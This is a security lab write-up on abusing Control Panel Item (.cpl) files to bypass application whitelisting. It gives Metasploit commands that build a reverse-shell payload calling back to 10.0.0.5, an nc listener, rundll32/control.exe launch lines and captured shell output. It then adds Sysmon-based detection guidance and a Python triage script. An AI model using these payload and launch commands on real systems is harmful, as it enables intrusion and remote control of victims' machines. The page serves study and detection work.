Control Panel Item
Control Panel Item code execution - bypass application whitelisting.

Execution

Generating a simple x64 reverse shell in a .cpl format:
msfconsole
use windows/local/cve_2017_8464_lnk_lpe
set payload windows/x64/shell_reverse_tcp
set lhost 10.0.0.5
exploit

# listener on the attacking machine:
nc -lvp 4444
listening on [any] 4444 ...
We can see that the .cpl is simply a DLL with a DllMain function exported:
A quick look at the disassembly of the DLL suggests that rundll32.exe will be spawned and a new thread will be created in suspended mode; that thread will most likely be injected with our shellcode and then resumed to execute it:
Invoking the shellcode via control.exe:
control.exe .\FlashPlayerCPLApp.cpl
# or
rundll32.exe shell32.dll,Control_RunDLL file.cpl
# or
rundll32.exe shell32.dll,Control_RunDLLAsUser file.cpl
Attacking machine receiving the reverse shell:
10.0.0.2: inverse host lookup failed: Unknown host
connect to [10.0.0.5] from (UNKNOWN) [10.0.0.2] 49346
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

Observations

Note how rundll32 spawns cmd.exe and establishes a connection back to the attacker - these are signs that should raise your suspicion when investigating a host for a compromise:
As always, Sysmon logging can help in finding suspicious command lines being executed in your environment:
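To make the Sysmon observation concrete, here is an added triage example (not code from the original page) that scans constructed Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records for the three behaviours shown above: control.exe or rundll32.exe loading a .cpl, rundll32.exe spawning a shell, and rundll32.exe connecting outbound. The sample records and the "is the .cpl outside System32" heuristic are this example's own assumptions, meant to separate the built-in applets from a dropped one.

```python
import ntpath
import re

# Constructed Sysmon-style records (not real logs); field names follow Sysmon's schema.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r"control.exe .\FlashPlayerCPLApp.cpl", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe shell32.dll,Control_RunDLL "C:\experiments\cpl\FlashPlayerCPLApp.cpl"',
     "ParentImage": r"C:\Windows\System32\control.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 4444},
    # Benign baseline: a user opening the built-in Programs and Features applet.
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\appwiz.cpl",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

CPL_RE = re.compile(r'"?([^"\s]+\.cpl)"?', re.IGNORECASE)   # first .cpl token, quoted or not
SYSTEM_DIR = "c:\\windows\\system32\\"                        # heuristic: built-in applets live here
SHELLS = {"cmd.exe", "powershell.exe"}

def basename(path):
    return ntpath.basename(path).lower()

def cpl_from_commandline(cmdline):
    m = CPL_RE.search(cmdline)
    return m.group(1) if m else None

def is_system_cpl(path):
    # normpath keeps the drive letter, so a relative ".\x.cpl" never matches the system dir
    return ntpath.normpath(path).lower().startswith(SYSTEM_DIR)

def triage(events):
    """Return (event_index, reason) pairs for records matching the behaviours above."""
    hits = []
    for i, ev in enumerate(events):
        img, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
        if ev["EventID"] == 1 and img in {"control.exe", "rundll32.exe"}:
            cpl = cpl_from_commandline(ev.get("CommandLine", ""))
            if cpl and not is_system_cpl(cpl):
                hits.append((i, f"{img} loading .cpl from non-system path: {cpl}"))
        if ev["EventID"] == 1 and parent == "rundll32.exe" and img in SHELLS:
            hits.append((i, f"rundll32.exe spawned {img}"))
        if ev["EventID"] == 3 and img == "rundll32.exe":
            hits.append((i, f"rundll32.exe connected to {ev['DestinationIp']}:{ev['DestinationPort']}"))
    return hits

if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(idx, reason)
```

Expect the control.exe launch, the rundll32 .cpl load from C:\experiments, the cmd.exe child and the outbound connection to be flagged, while the appwiz.cpl record passes because it sits under System32.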

Bonus - Create Shortcut With PowerShell

$TargetFile = "$env:SystemRoot\System32\calc.exe"
$ShortcutFile = "C:\experiments\cpl\calc.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
